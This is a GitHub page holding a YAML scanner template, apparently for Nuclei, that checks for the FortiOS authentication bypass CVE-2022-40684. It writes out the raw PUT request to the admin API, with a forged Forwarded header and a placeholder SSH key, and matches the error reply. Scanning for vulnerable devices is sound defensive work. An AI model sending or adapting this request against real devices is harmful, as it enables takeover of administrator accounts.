forked from NagliNagli/Shockwave-OSS
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2022-40684.yaml
30 lines (25 loc) · 982 Bytes
/
CVE-2022-40684.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
id: CVE-2022-40684
info:
name: FortiOS Authentication Bypass
author: Shockwave
severity: Critical
description: An authentication bypass using an alternate path or channel vulnerability [CWE-288] in FortiOS, FortiProxy and FortiSwitchManager may allow an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
reference:
- https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684/
tags: authentication bypass
requests:
- raw:
- |
PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
Host: {{Hostname}}
User-Agent: Report Runner
Content-Type: application/json
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Content-Length: 610
{
"ssh-public-key1": "fake-key"
}
matchers:
- type: word
words:
- 'Invalid SSH public key.\'